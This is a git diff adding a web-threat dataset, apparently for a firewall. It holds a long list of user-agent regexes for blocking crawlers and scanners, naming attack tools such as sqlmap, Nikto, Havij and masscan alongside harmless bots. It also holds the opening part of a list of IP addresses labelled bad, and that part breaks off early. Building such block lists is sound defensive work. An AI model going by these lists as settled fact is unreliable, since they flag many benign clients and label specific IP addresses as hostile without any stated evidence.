diff --git a/README.md b/README.md
index 09736f6..6d1af78 100644
--- a/README.md
+++ b/README.md
@@ -10,14 +10,14 @@ This collection serves as the primary repository of external resources/datasets
 | -------------------- | --------- |
 | Common Web Attack    | 76      |
 | CVEs                 | 2610      |
-| Bad IP Address       | 19356      |
+| Bad IP Address       | 19062      |
 | Bad Referrer         | 7104      |
 | Bad Crawler          | 1409      |
 | Directory Bruteforce | 5331      |
-|       **Total**      | **35886**      |
+|       **Total**      | **35592**      |
 
 > [!NOTE]
-> Last updated at **Fri Sep 13 00:47:47 UTC 2024**.
+> Last updated at **Sat Sep 14 00:47:03 UTC 2024**.
 
 ## Contributions
 
diff --git a/db/MD5SUMS b/db/MD5SUMS
new file mode 100644
index 0000000..b44a260
--- /dev/null
+++ b/db/MD5SUMS
@@ -0,0 +1,7 @@
+600f383cdca9cb03645f51f07864cdc7  bad-crawlers.txt
+b252e13774787b35931b71ee2e314fc8  bad-ip-addresses.txt
+8f186aa10b19ce75203890934508f9e1  bad-referrers.txt
+394f8e08f61e118f284f899558f6629f  common-web-attacks.json
+e3675dc05fc7b9c3bb7e61ad5df268c7  cves.json
+1756a6e8101cf6eab8df940560a98653  db.tar.zst
+267a3613bc77c10c6586949e086e8c92  directory-bruteforces.txt
diff --git a/db/bad-crawlers.txt b/db/bad-crawlers.txt
new file mode 100644
index 0000000..a3edf95
--- /dev/null
+++ b/db/bad-crawlers.txt
@@ -0,0 +1,1410 @@
+ YLT
+^Aether
+^Amazon Simple Notification Service Agent$
+^Amazon-Route53-Health-Check-Service
+^Amazon CloudFront
+^b0t$
+^bluefish 
+^Calypso v\/
+^COMODO DCV
+^Corax
+^DangDang
+^DavClnt
+^DHSH
+^docker\/[0-9]
+^Expanse
+^FDM 
+^git\/
+^Goose\/
+^Grabber
+^Gradle\/
+^HTTPClient\/
+^HTTPing
+^Java\/
+^Jeode\/
+^Jetty\/
+^Mail\/
+^Mget
+^Microsoft URL Control
+^Mikrotik\/
+^Netlab360
+^NG\/[0-9\.]
+^NING\/
+^npm\/
+^Nuclei
+^PHP-AYMAPI\/
+^PHP\/
+^pip\/
+^pnpm\/
+^RMA\/
+^Ruby|Ruby\/[0-9]
+^Swurl 
+^TLS tester 
+^twine\/
+^ureq
+^VSE\/[0-9]
+^WordPress\.com
+^XRL\/[0-9]
+^ZmEu
+008\/
+13TABS
+192\.comAgent
+2GDPR\/
+2ip\.ru
+404enemy
+7Siters
+80legs
+a3logics\.in
+A6-Indexer
+Abonti
+Aboundex
+aboutthedomain
+Accoona-AI-Agent
+acebookexternalhit\/
+acoon
+acrylicapps\.com\/pulp
+Acunetix
+AdAuth\/
+adbeat
+AddThis
+ADmantX
+AdminLabs
+adressendeutschland
+adreview\/
+adscanner
+adstxt-worker
+Adstxtaggregator
+adstxt\.com
+Adyen HttpClient
+AffiliateLabz\/
+affilimate-puppeteer
+agentslug
+AHC
+aihit
+aiohttp\/
+Airmail
+akka-http\/
+akula\/
+alertra
+alexa site audit
+Alibaba\.Security\.Heimdall
+Alligator
+allloadin
+AllSubmitter
+alyze\.info
+amagit
+Anarchie
+AndroidDownloadManager
+Anemone
+AngleSharp
+annotate_google
+Anthill
+Anturis Agent
+Ant\.com
+AnyEvent-HTTP\/
+Apache Ant\/
+Apache Droid
+Apache OpenOffice
+Apache-HttpAsyncClient
+Apache-HttpClient
+ApacheBench
+Apexoo
+apimon\.de
+APIs-Google
+AportWorm\/
+AppBeat\/
+AppEngine-Google
+AppleSyndication
+Aprc\/[0-9]
+Arachmo
+arachnode
+Arachnophilia
+aria2
+Arukereso
+asafaweb
+Asana\/
+Ask Jeeves
+AskQuickly
+ASPSeek
+Asterias
+Astute
+asynchttp
+Attach
+attohttpc
+autocite
+AutomaticWPTester
+Autonomy
+awin\.com
+AWS Security Scanner
+axios\/
+a\.pr-cy\.ru
+B-l-i-t-z-B-O-T
+Backlink-Ceck
+BacklinkHttpStatus
+BackStreet
+BackupLand
+BackWeb
+Bad-Neighborhood
+Badass
+baidu\.com
+Bandit
+basicstate
+BatchFTP
+Battleztar Bazinga
+baypup\/
+BazQux
+BBBike
+BCKLINKS
+BDFetch
+BegunAdvertising
+Bewica-security-scan
+Bidtellect
+BigBozz
+Bigfoot
+biglotron
+BingLocalSearch
+BingPreview
+binlar
+biNu image cacher
+Bitacle
+Bitrix link preview
+biz_Directory
+BKCTwitterUnshortener\/
+Black Hole
+Blackboard Safeassign
+BlackWidow
+BlockNote\.Net
+BlogBridge
+Bloglines
+Bloglovin
+BlogPulseLive
+BlogSearch
+Blogtrottr
+BlowFish
+boitho\.com-dc
+Boost\.Beast
+BPImageWalker
+Braintree-Webhooks
+Branch Metrics API
+Branch-Passthrough
+Brandprotect
+Brandwatch
+Brodie\/
+Browsershots
+BUbiNG
+Buck\/
+Buddy
+BuiltWith
+Bullseye
+BunnySlippers
+Burf Search
+Butterfly\/
+BuzzSumo
+CAAM\/[0-9]
+CakePHP
+Calculon
+Canary%20Mail
+CaretNail
+catexplorador
+CC Metadata Scaper
+Cegbfeieh
+censys
+centuryb.o.t9[at]gmail.com
+Cerberian Drtrs
+CERT\.at-Statistics-Survey
+cf-facebook
+cg-eye
+changedetection
+ChangesMeter
+Charlotte
+chatterino-api-cache
+CheckHost
+checkprivacy
+CherryPicker
+ChinaClaw
+Chirp\/
+chkme\.com
+Chlooe
+Chromaxa
+CirrusExplorer
+CISPA Vulnerability Notification
+CISPA Web Analyser
+Citoid
+CJNetworkQuality
+Clarsentia
+clips\.ua\.ac\.be
+Cloud mapping
+CloudEndure
+CloudFlare-AlwaysOnline
+Cloudflare-Healthchecks
+Cloudinary
+cmcm\.com
+coccoc
+cognitiveseo
+ColdFusion
+colly -
+CommaFeed
+Commons-HttpClient
+commonscan
+contactbigdatafr
+contentkingapp
+Contextual Code Sites Explorer
+convera
+CookieReports
+copyright sheriff
+CopyRightCheck
+Copyscape
+cortex\/
+Cosmos4j\.feedback
+Covario-IDS
+Craw\/
+Crescent
+Criteo
+Crowsnest
+CSHttp
+CSSCheck
+Cula\/
+curb
+Curious George
+curl
+cuwhois\/
+cybo\.com
+DAP\/NetHTTP
+DareBoost
+DatabaseDriverMysqli
+DataCha0s
+DatadogSynthetics
+Datafeedwatch
+Datanyze
+DataparkSearch
+dataprovider
+DataXu
+Daum(oa)?[ \/][0-9]
+dBpoweramp
+ddline
+deeris
+delve\.ai
+Demon
+DeuSu
+developers\.google\.com\/\+\/web\/snippet\/
+Devil
+Digg
+Digincore
+DigitalPebble
+Dirbuster
+Discourse Forum Onebox
+Dispatch\/
+Disqus\/
+DittoSpyder
+dlvr
+DMBrowser
+DNSPod-reporting
+docoloc
+Dolphin http client
+DomainAppender
+DomainLabz
+Domains Project\/
+Donuts Content Explorer
+dotMailer content retrieval
+dotSemantic
+downforeveryoneorjustme
+Download Wonder
+downnotifier
+DowntimeDetector
+Drip
+drupact
+Drupal \(\+http:\/\/drupal\.org\/\)
+DTS Agent
+dubaiindex
+DuplexWeb-Google
+DynatraceSynthetic
+EARTHCOM
+Easy-Thumb
+EasyDL
+Ebingbong
+ec2linkfinder
+eCairn-Grabber
+eCatch
+ECCP
+eContext\/
+Ecxi
+EirGrabber
+ElectricMonk
+elefent
+EMail Exractor
+EMail Wolf
+EmailWolf
+Embarcadero
+Embed PHP Library
+Embedly
+endo\/
+europarchive\.org
+evc-batch
+EventMachine HttpClient
+Everwall Link Expander
+Evidon
+Evrinid
+ExactSearch
+ExaleadCloudview
+Excel\/
+exif
+ExoRank
+Exploratodo
+Express WebPictures
+Extreme Picture Finder
+EyeNetIE
+ezooms
+facebookcatalog
+facebookexternalhit
+facebookexternalua
+facebookplatform
+fairshare
+Faraday v
+fasthttp
+Faveeo
+Favicon downloader
+faviconarchive
+faviconkit
+FavOrg
+Feed Wrangler
+Feedable\/
+Feedbin
+FeedBooster
+FeedBucket
+FeedBunch\/
+FeedBurner
+feeder
+Feedly
+FeedshowOnline
+Feedshow\/
+Feedspot
+FeedViewer\/
+Feedwind\/
+FeedZcollector
+feeltiptop
+Fetch API
+Fetch\/[0-9]
+Fever\/[0-9]
+FHscan
+Fiery%20Feeds
+Filestack
+Fimap
+findlink
+findthatfile
+FlashGet
+FlipboardBrowserProxy
+FlipboardProxy
+FlipboardRSS
+Flock\/
+Florienzh\/
+fluffy
+Flunky
+flynxapp
+forensiq
+ForusP
+FoundSeoTool
+fragFINN\.de
+free thumbnails
+Freeuploader
+FreshRSS
+frontman
+Funnelback
+Fuzz Faster U Fool
+G-i-g-a-b-o-t
+g00g1e\.net
+ganarvisitas
+gdnplus\.com
+GeedoProductSearch
+geek-tools
+Genieo
+GentleSource
+GetCode
+Getintent
+GetLinkInfo
+getprismatic
+GetRight
+getroot
+GetURLInfo\/
+GetWeb
+Geziyor
+Ghost Inspector
+GigablastOpenSource
+GIS-LABS
+github-camo
+GitHub-Hookshot
+github\.com
+Go http package
+Go [\d\.]* package http
+Go!Zilla
+Go-Ahead-Got-It
+Go-http-client
+go-mtasts\/
+gobuster
+gobyus
+Gofeed
+gofetch
+Goldfire Server
+GomezAgent
+gooblog
+Goodzer\/
+Google AppsViewer
+Google Desktop
+Google favicon
+Google Keyword Suggestion
+Google Keyword Tool
+Google Page Speed Insights
+Google PP Default
+Google Search Console
+Google Web Preview
+Google-Ads
+Google-Adwords
+Google-Apps-Script
+Google-Calendar-Importer
+Google-HotelAdsVerifier
+Google-HTTP-Java-Client
+Google-InspectionTool
+Google-Podcast
+Google-Publisher-Plugin
+Google-Read-Aloud
+Google-SearchByImage
+Google-Site-Verification
+Google-SMTP-STS
+Google-speakr
+Google-Structured-Data-Testing-Tool
+Google-Transparency-Report
+google-xrawler
+Google-Youtube-Links
+GoogleDocs
+GoogleHC\/
+GoogleOther
+GoogleProber
+GoogleProducer
+GoogleSites
+Gookey
+GoSpotCheck
+gosquared-thumbnailer
+Gotit
+GoZilla
+grabify
+GrabNet
+Grafula
+Grammarly
+GrapeFX
+GreatNews
+Gregarius
+GRequests
+grokkit
+grouphigh
+grub-client
+gSOAP\/
+GT::WWW
+GTmetrix
+GuzzleHttp
+gvfs\/
+HAA(A)?RTLAND http client
+Haansoft
+hackney\/
+Hadi Agent
+HappyApps-WebCheck
+Hardenize
+Hatena
+Havij
+HaxerMen
+HeadlessChrome
+HEADMasterSEO
+HeartRails_Capture
+help@dataminr\.com
+heritrix
+Hexometer
+historious
+hkedcity
+hledejLevne\.cz
+Hloader
+HMView
+Holmes
+HonesoSearchEngine
+HootSuite Image proxy
+Hootsuite-WebFeed
+hosterstats
+HostTracker
+ht:\/\/check
+htdig
+HTMLparser
+htmlyse
+HTTP Banner Detection
+http-get
+HTTP-Header-Abfrage
+http-kit
+http-request\/
+HTTP-Tiny
+HTTP::Lite
+http:\/\/www.neomo.de\/
+HttpComponents
+httphr
+HTTPie
+HTTPMon
+httpRequest
+httpscheck
+httpssites_power
+httpunit
+HttpUrlConnection
+http\.rb\/
+HTTP_Compression_Test
+http_get
+http_request2
+http_requester
+httrack
+huaweisymantec
+HubSpot 
+HubSpot-Link-Resolver
+Humanlinks
+i2kconnect\/
+Iblog
+ichiro
+Id-search
+IdeelaborPlagiaat
+IDG Twitter Links Resolver
+IDwhois\/
+Iframely
+igdeSpyder
+iGooglePortal
+IlTrovatore
+Image Fetch
+Image Sucker
+ImageEngine\/
+ImageVisu\/
+Imagga
+imagineeasy
+imgsizer
+InAGist
+inbound\.li parser
+InDesign%20CC
+Indy Library
+InetURL
+infegy
+infohelfer
+InfoTekies
+InfoWizards Reciprocal Link
+inpwrd\.com
+instabid
+Instapaper
+Integrity
+integromedb
+Intelliseek
+InterGET
+Internet Ninja
+InternetSeer
+internetVista monitor
+internetwache
+internet_archive
+intraVnews
+IODC
+IOI
+Inboxb0t
+iplabel
+ips-agent
+IPS\/[0-9]
+IPWorks HTTP\/S Component
+iqdb\/
+Iria
+Irokez
+isitup\.org
+iskanie
+isUp\.li
+iThemes Sync\/
+IZaBEE
+iZSearch
+JAHHO
+janforman
+Jaunt\/
+Java.*outbrain
+javelin\.io
+Jbrofuzz
+Jersey\/
+JetCar
+Jigsaw
+Jobboerse
+JobFeed discovery
+Jobg8 URL Monitor
+jobo
+Jobrapido
+Jobsearch1\.5
+JoinVision Generic
+JolokiaPwn
+Joomla
+Jorgee
+JS-Kit
+JungleKeyThumbnail
+JustView
+Kaspersky Lab CFR link resolver
+Kelny\/
+Kerrigan\/
+KeyCDN
+Keyword Density
+Keywords Research
+khttp\/
+KickFire
+KimonoLabs\/
+Kml-Google
+knows\.is
+KOCMOHABT
+kouio
+kube-probe
+kubectl
+kulturarw3
+KumKie
+Larbin
+Lavf\/
+leakix\.net
+LeechFTP
+LeechGet
+letsencrypt
+Lftp
+LibVLC
+LibWeb
+Libwhisker
+libwww
+Licorne
+Liferea\/
+Lighthouse
+Lightspeedsystems
+Likse
+limber\.io
+Link Valet
+LinkAlarm\/
+LinkAnalyser
+link-check
+linkCheck
+linkdex
+LinkExaminer
+linkfluence
+linkpeek
+LinkPreview
+LinkScan
+LinksManager
+LinkTiger
+LinkWalker
+link_thumbnailer
+Lipperhey
+Litemage_walker
+livedoor ScreenShot
+LoadImpactRload
+localsearch-web
+LongURL API
+longurl-r-package
+looid\.com
+looksystems\.net
+lscache_runner
+ltx71
+lua-resty-http
+Lucee \(CFML Engine\)
+Lush Http Client
+lwp-request
+lwp-trivial
+LWP::Simple
+lycos
+LYT\.SR
+L\.webis
+mabontland
+MacOutlook\/
+Mag-Net
+MagpieRSS
+Mail::STS
+MailChimp
+Mail\.Ru
+Majestic12
+makecontact\/
+Mandrill
+MapperCmd
+marketinggrader
+MarkMonitor
+MarkWatch
+Mass Downloader
+masscan\/
+Mata Hari
+mattermost
+Mediametric
+Mediapartners-Google
+mediawords
+MegaIndex\.ru
+MeltwaterNews
+Melvil Rawi
+MemGator
+Metaspinner
+MetaURI
+MFC_Tear_Sample
+Microsearch
+Microsoft Data Access
+Microsoft Office
+Microsoft Outlook
+Microsoft Windows Network Diagnostics
+Microsoft-WebDAV-MiniRedir
+Microsoft\.Data\.Mashup
+MicrosoftPreview
+MIDown tool
+MIIxpc
+Mindjet
+Miniature\.io
+Miniflux
+mio_httpc
+Miro-HttpClient
+Mister PiX
+mixdata dot com
+mixed-content-scan
+mixnode
+Mnogosearch
+mogimogi
+Mojeek
+Mojolicious \(Perl\)
+Mollie
+monitis
+Monitority\/
+Monit\/
+montastic
+MonTools
+Moreover
+Morfeus Fucking Scanner
+Morning Paper
+MovableType
+mowser
+Mrcgiguy
+Mr\.4x3 Powered
+MS Web Services Client Protocol
+MSFrontPage
+mShots
+MuckRack\/
+muhstik-scan
+MVAClient
+MxToolbox\/
+myseosnapshot
+nagios
+Najdi\.si
+Name Intelligence
+NameFo\.com
+Nameprotect
+nationalarchives
+Navroad
+nbertaupete95
+NearSite
+Needle
+Nessus
+Net Vampire
+NetAnts
+NETCRAFT
+NetLyzer
+NetMechanic
+NetNewsWire
+Netpursual
+netresearch
+NetShelter ContentScan
+Netsparker
+NetSystemsResearch
+nettle
+NetTrack
+Netvibes
+NetZIP
+Neustar WPM
+NeutrinoAPI
+NewRelicPinger
+NewsBlur .*Finder
+NewsGator
+newsme
+newspaper\/
+Nexgate Ruby Client
+NG-Search
+nghttp2
+Nibbler
+NICErsPRO
+NihilScio
+Nikto
+nineconnections
+NLNZ_IAHarvester
+Nmap Scripting Engine
+node-fetch
+node-superagent
+node-urllib
+Nodemeter
+NodePing
+node\.io
+nominet\.org\.uk
+nominet\.uk
+Norton-Safeweb
+Notifixious
+notifyninja
+NotionEmbedder
+nuhk
+nutch
+Nuzzel
+nWormFeedFinder
+nyawc\/
+Nymesis
+NYU
+Observatory\/
+Ocelli\/
+Octopus
+oegp
+Offline Explorer
+Offline Navigator
+OgScrper
+okhttp
+omgili
+OMSC
+Online Domain Tools
+Open Source RSS
+OpenCalaisSemanticProxy
+Openfind
+OpenLinkProfiler
+Openstat\/
+OpenVAS
+OPPO A33
+Optimizer
+Orbiter
+OrgProbe\/
+orion-semantics
+Outlook-Express
+Outlook-iOS
+Owler
+Owlin
+ownCloud News
+ow\.ly
+OxfordCloudService
+page scorer
+Page Valet
+page2rss
+PageFreezer
+PageGrabber
+PagePeeker
+PageScorer
+Pagespeed\/
+PageThing
+page_verifier
+Panopta
+panscient
+Papa Foto
+parsijoo
+Pavuk
+PayPal IPN
+pcBrowser
+Pcore-HTTP
+PDF24 URL To PDF
+Pearltrees
+PECL::HTTP
+peerindex
+Peew
+PeoplePal
+Perlu -
+PhantomJS Screenshoter
+PhantomJS\/
+Photon\/
+php-requests
+phpservermon
+Pi-Monster
+Picscout
+Picsearch
+PictureFinder
+Pimonster
+Pingability
+PingAdmin\.Ru
+Pingdom
+Pingoscope
+PingSpot
+ping\.blo\.gs
+pinterest\.com
+Pixray
+Pizilla
+Plagger\/
+Pleroma 
+Ploetz \+ Zeller
+Plukkie
+plumanalytics
+PocketImageCache
+PocketParser
+Pockey
+PodcastAddict\/
+POE-Component-Client-HTTP
+Polymail\/
+Pompos
+Porkbun
+Port Monitor
+postano
+postfix-mta-sts-resolver
+PostmanRuntime
+postplanner\.com
+PostPost
+postrank
+PowerPoint\/
+Prebid
+Prerender
+Priceonomics Analysis Engine
+PrintFriendly
+PritTorrent
+Prlog
+probely\.com
+probethenet
+Project ?25499
+Project-Resonance
+prospectb2b
+Protopage
+ProWebWalker
+proximic
+PRTG Network Monitor
+pshtt, https scanning
+PTST 
+PTST\/[0-9]+
+pulsetic\.com
+Pump
+Python-httplib2
+python-httpx
+python-requests
+Python-urllib
+Qirina Hurdler
+QQDownload
+QrafterPro
+Qseero
+Qualidator
+QueryN Metasearch
+queuedriver
+quic-go-HTTP\/
+QuiteRSS
+Quora Link Preview
+Qwantify
+Radian6
+RadioPublicImageResizer
+Railgun\/
+RankActive
+RankFlex
+RankSonicSiteAuditor
+RapidLoad\/
+Re-re Studio
+ReactorNetty
+Readability
+RealDownload
+RealPlayer%20Downloader
+RebelMouse
+Recorder
+RecurPost\/
+redback\/
+ReederForMac
+Reeder\/
+ReGet
+RepoMonkey
+request\.js
+reqwest\/
+ResponseCodeTest
+RestSharp
+Riddler
+Rival IQ
+Robosourcer
+Robozilla
+ROI Hunter
+RPT-HTTPClient
+RSSMix\/
+RSSOwl
+RyowlEngine
+safe-agent-scanner
+SalesIntelligent
+Saleslift
+SAP NetWeaver Application Server
+SauceNAO
+SBIder
+sc-downloader
+scalaj-http
+Scamadviser-Frontend
+ScanAlert
+scan\.lol
+Scoop
+scooter
+ScopeContentAG-HTTP-Client
+ScoutJet
+ScoutURLMonitor
+ScrapeBox Page Scanner
+Scrapy
+Screaming
+ScreenShotService
+Scrubby
+Scrutiny\/
+Search37
+searchenginepromotionhelp
+Searchestate
+SearchExpress
+SearchSight
+SearchWP
+search\.thunderstone
+Seeker
+semanticdiscovery
+semanticjuice
+Semiocast HTTP client
+Semrush
+Sendsay\.Ru
+sentry\/
+SEO Browser
+Seo Servis
+seo-nastroj\.cz
+seo4ajax
+Seobility
+SEOCentro
+SeoCheck
+seocompany
+SEOkicks
+SEOlizer
+Seomoz
+SEOprofiler
+seoscanners
+SEOsearch
+seositecheckup
+SEOstats
+servernfo
+sexsearcher
+Seznam
+Shelob
+Shodan
+Shoppimon
+ShopWiki
+ShortLinkTranslate
+shortURL lengthener
+shrinktheweb
+Sideqik
+Siege
+SimplePie
+SimplyFast
+Siphon
+SISTRIX
+Site Sucker
+Site-Shot\/
+Site24x7
+SiteBar
+Sitebeam
+Sitebulb\/
+SiteCondor
+SiteExplorer
+SiteGuardian
+Siteimprove
+SiteIndexed
+Sitemap(s)? Generator
+SitemapGenerator
+SiteMonitor
+Siteshooter B0t
+SiteSnagger
+SiteSucker
+SiteTruth
+Sitevigil
+sitexy\.com
+SkypeUriPreview
+Slack\/
+sli-systems\.com
+slider\.com
+slurp
+SlySearch
+SmartDownload
+SMRF URL Expander
+SMUrlExpander
+Snake
+Snappy
+SnapSearch
+Snarfer\/
+SniffRSS
+sniptracker
+Snoopy
+SnowHaze Search
+sogou web
+SortSite
+Sottopop
+sovereign\.ai
+SpaceBison
+SpamExperts
+Spammen
+Spanner
+Spawning-AI
+spaziodati
+SPDYCheck
+Specificfeeds
+SpeedKit
+speedy
+SPEng
+Spinn3r
+spray-can
+Sprinklr 
+spyonweb
+sqlmap
+Sqlworm
+Sqworm
+SSL Labs
+ssl-tools
+StackRambler
+Statastico\/
+Statically-
+StatusCake
+Steeler
+Stratagems Kumo
+Stripe\/
+Stroke\.cz
+StudioFACA
+StumbleUpon
+suchen
+Sucuri
+summify
+SuperHTTP
+Surphace Scout
+Suzuran
+swcd 
+Symfony BrowserKit
+Symfony2 BrowserKit
+Synapse\/
+Syndirella\/
+SynHttpClient-Built
+Sysomos
+sysscan
+Szukacz
+T0PHackTeam
+tAkeOut
+Tarantula\/
+Taringa UGC
+TarmotGezgin
+tchelebi\.io
+techiaith\.cymru
+Teleport
+Telesoft
+Telesphoreo
+Telesphorep
+Tenon\.io
+teoma
+terrainformatica
+Test Certificate Info
+testuri
+Tetrahedron
+TextRazor Downloader
+The Drop Reaper
+The Expert HTML Source Viewer
+The Intraformant
+The Knowledge AI
+theinternetrules
+TheNomad
+Thinklab
+Thumbor
+Thumbshots
+ThumbSniper
+timewe\.net
+TinEye
+Tiny Tiny RSS
+TLSProbe\/
+Toata
+topster
+touche\.com
+Traackr\.com
+tracemyfile
+Trackuity
+TrapitAgent
+Trendiction
+Trendsmap
+trendspottr
+truwoGPS
+TryJsoup
+TulipChain
+Turingos
+Turnitin
+tweetedtimes
+Tweetminster
+Tweezler\/
+twibble
+Twice
+Twikle
+Twingly
+Twisted PageGetter
+Typhoeus
+ubermetrics-technologies
+uclassify
+UdmSearch
+ultimate_sitemap_parser
+unchaos
+unirest-java
+UniversalFeedParser
+unshortenit
+Unshorten\.It
+Untiny
+UnwindFetchor
+updated
+updown\.io daemon
+Upflow
+Uptimia
+URL Verifier
+Urlcheckr
+URLitor
+urlresolver
+Urlstat
+URLTester
+UrlTrends Ranking Updater
+URLy Warning
+URLy\.Warning
+URL\/Emacs
+Vacuum
+Vagabondo
+VB Project
+vBSEO
+VCI
+Verity
+via ggpht\.com GoogleImageProxy
+Virusdie
+visionutils
+Visual Rights Group
+vkShare
+VoidEYE
+Voil
+voltron
+voyager\/
+VSAgent\/
+VSB-TUO\/
+Vulnbusters Meter
+VYU2
+w3af\.org
+W3C-checklink
+W3C-mobileOK
+W3C_Unicorn
+WAC-OFU
+WakeletLinkExpander
+WallpapersHD
+Wallpapers\/[0-9]+
+wangling
+Wappalyzer
+WatchMouse
+WbSrch\/
+WDT\.io
+Web Auto
+Web Collage
+Web Enhancer
+Web Fetch
+Web Fuck
+Web Pix
+Web Sauger
+Web spyder
+Web Sucker
+web-capture\.net
+Web-sniffer
+Webalta
+Webauskunft
+WebAuto
+WebCapture
+WebClient\/
+webcollage
+WebCookies
+WebCopier
+WebCorp
+WebDataStats
+WebDoc
+WebEnhancer
+WebFetch
+WebFuck
+WebGazer
+WebGo IS
+WebImageCollector
+WebImages
+WebIndex
+webkit2png
+WebLeacher
+webmastercoffee
+webmon 
+WebPix
+WebReaper
+WebSauger
+webscreenie
+Webshag
+Webshot
+Website Quester
+websitepulse agent
+WebsiteQuester
+Websnapr
+WebSniffer
+Webster
+WebStripper
+WebSucker
+webtech\/
+WebThumbnail
+Webthumb\/
+WebWhacker
+WebZIP
+WeLikeLinks
+WEPA
+WeSEE
+wf84
+Wfuzz\/
+wget
+WhatCMS
+WhatsApp
+WhatsMyIP
+WhatWeb
+WhereGoes\?
+Whibse
+WhoAPI\/
+WhoRunsCoinHive
+Whynder Magnet
+Windows-RSS-Platform
+WinHttp-Autoproxy-Service
+WinHTTP\/
+WinPodder
+wkhtmlto
+wmtips
+Woko
+Wolfram HTTPClient
+woorankreview
+WordPress\/
+WordupinfoSearch
+Word\/
+worldping-api
+wotbox
+WP Engine Install Performance API
+WP Rocket
+wpif
+wprecon\.com survey
+WPScan
+wscheck
+Wtrace
+WWW-Collector-E
+WWW-Mechanize
+WWW::Document
+WWW::Mechanize
+WWWOFFLE
+www\.monitor\.us
+x09Mozilla
+x22Mozilla
+XaxisSemanticsClassifier
+XenForo\/
+Xenu Link Sleuth
+XING-contenttabreceiver
+xpymep([0-9]?)\.exe
+Y!J-[A-Z][A-Z][A-Z]
+Yaanb
+yacy
+Yahoo Link Preview
+YahooCacheSystem
+YahooMailProxy
+YahooYSMcm
+YandeG
+Yandex(?!Search)
+yanga
+yeti
+Yo-yo
+Yoleo Consumer
+yomins\.com
+yoogliFetchAgent
+YottaaMonitor
+Your-Website-Sucks
+yourls\.org
+YoYs\.net
+YP\.PL
+Zabbix
+Zade
+Zao
+Zapier
+Zauba
+Zemanta Aggregator
+Zend\\Http\\Client
+Zend_Http_Client
+Zermelo
+Zeus 
+zgrab
+ZnajdzFoto
+ZnHTTP
+Zombie\.js
+Zoom\.Mac
+ZoteroTranslationServer
+ZyBorg
+[a-z0-9\-_]*(bot|crawl|archiver|transcoder|spider|uptime|validator|fetcher|cron|checker|reader|extractor|monitoring|analyzer|scraper)
\ No newline at end of file
diff --git a/db/bad-ip-addresses.txt b/db/bad-ip-addresses.txt
new file mode 100644
index 0000000..910d5df
--- /dev/null
+++ b/db/bad-ip-addresses.txt
@@ -0,0 +1,19062 @@
+1.11.62.197
+1.116.136.219
+1.116.198.56
+1.12.230.7
+1.12.52.98
+1.13.188.200
+1.13.9.191
+1.14.177.4
+1.14.205.166
+1.15.241.99
+1.174.20.156
+1.179.220.209
+1.180.89.50
+1.180.98.210
+1.183.13.194
+1.194.160.100
+1.194.160.101
+1.194.160.99
+1.197.78.123
+1.212.225.99
+1.213.180.227
+1.214.118.240
+1.214.156.4
+1.214.195.229
+1.214.197.163
+1.215.240.130
+1.218.138.131
+1.227.83.100
+1.227.83.32
+1.232.29.63
+1.234.31.117
+1.234.58.179
+1.234.58.189
+1.234.58.234
+1.234.58.235
+1.235.192.130
+1.235.192.131
+1.236.156.129
+1.238.106.229
+1.245.207.104
+1.245.241.62
+1.252.63.242
+1.254.101.182
+1.27.171.154
+1.27.171.46
+1.28.192.118
+1.28.192.150
+1.28.194.22
+1.28.80.2
+1.30.20.2
+1.30.20.238
+1.30.20.98
+1.31.80.166
+1.31.80.222
+1.34.230.46
+1.52.64.247
+1.55.33.86
+1.57.22.19
+1.69.115.168
+1.69.18.111
+1.69.4.107
+1.69.4.193
+1.69.57.69
+1.69.59.100
+1.69.68.230
+1.69.72.187
+1.69.73.157
+1.69.73.17
+1.69.77.67
+1.7.229.162
+1.70.10.138
+1.70.100.53
+1.70.101.220
+1.70.12.194
+1.70.124.179
+1.70.125.128
+1.70.125.27
+1.70.126.164
+1.70.126.221
+1.70.126.79
+1.70.127.130
+1.70.127.156
+1.70.13.83
+1.70.133.72
+1.70.134.111
+1.70.14.36
+1.70.140.145
+1.70.140.38
+1.70.140.46
+1.70.143.63
+1.70.160.142
+1.70.160.233
+1.70.163.229
+1.70.164.221
+1.70.165.46
+1.70.169.100
+1.70.170.55
+1.70.172.180
+1.70.184.223
+1.70.186.99
+1.70.188.33
+1.70.80.129
+1.70.80.99
+1.70.82.38
+1.70.83.77
+1.70.85.104
+1.70.99.160
+1.81.170.157
+1.82.135.154
+1.82.191.110
+1.82.217.54
+1.83.124.200
+1.83.158.84
+1.85.42.195
+1.94.14.96
+1.95.1.249
+100.15.97.125
+100.29.192.1
+100.29.192.10
+100.29.192.100
+100.29.192.101
+100.29.192.102
+100.29.192.103
+100.29.192.104
+100.29.192.105
+100.29.192.106
+100.29.192.107
+100.29.192.108
+100.29.192.109
+100.29.192.110
+100.29.192.112
+100.29.192.113
+100.29.192.114
+100.29.192.115
+100.29.192.116
+100.29.192.117
+100.29.192.118
+100.29.192.119
+100.29.192.12
+100.29.192.120
+100.29.192.121
+100.29.192.123
+100.29.192.124
+100.29.192.125
+100.29.192.126
+100.29.192.127
+100.29.192.13
+100.29.192.15
+100.29.192.16
+100.29.192.17
+100.29.192.18
+100.29.192.19
+100.29.192.2
+100.29.192.20
+100.29.192.21
+100.29.192.22
+100.29.192.23
+100.29.192.24
+100.29.192.25
+100.29.192.26
+100.29.192.27
+100.29.192.28
+100.29.192.29
+100.29.192.3
+100.29.192.30
+100.29.192.31
+100.29.192.32
+100.29.192.34
+100.29.192.35
+100.29.192.36
+100.29.192.37
+100.29.192.38
+100.29.192.39
+100.29.192.4
+100.29.192.40
+100.29.192.41
+100.29.192.42
+100.29.192.43
+100.29.192.45
+100.29.192.47
+100.29.192.48
+100.29.192.49
+100.29.192.5
+100.29.192.50
+100.29.192.51
+100.29.192.55
+100.29.192.56
+100.29.192.57
+100.29.192.58
+100.29.192.59
+100.29.192.6
+100.29.192.60
+100.29.192.61
+100.29.192.62
+100.29.192.63
+100.29.192.64
+100.29.192.65
+100.29.192.66
+100.29.192.67
+100.29.192.68
+100.29.192.69
+100.29.192.7
+100.29.192.70
+100.29.192.71
+100.29.192.72
+100.29.192.73
+100.29.192.74
+100.29.192.75
+100.29.192.76
+100.29.192.77
+100.29.192.78
+100.29.192.79
+100.29.192.8
+100.29.192.80
+100.29.192.81
+100.29.192.82
+100.29.192.83
+100.29.192.84
+100.29.192.85
+100.29.192.86
+100.29.192.87
+100.29.192.88
+100.29.192.89
+100.29.192.9
+100.29.192.90
+100.29.192.91
+100.29.192.92
+100.29.192.93
+100.29.192.94
+100.29.192.95
+100.29.192.96
+100.29.192.97
+100.29.192.98
+100.29.192.99
+100.37.98.10
+100.42.181.187
+101.100.184.80
+101.111.42.101
+101.126.14.37
+101.126.16.127
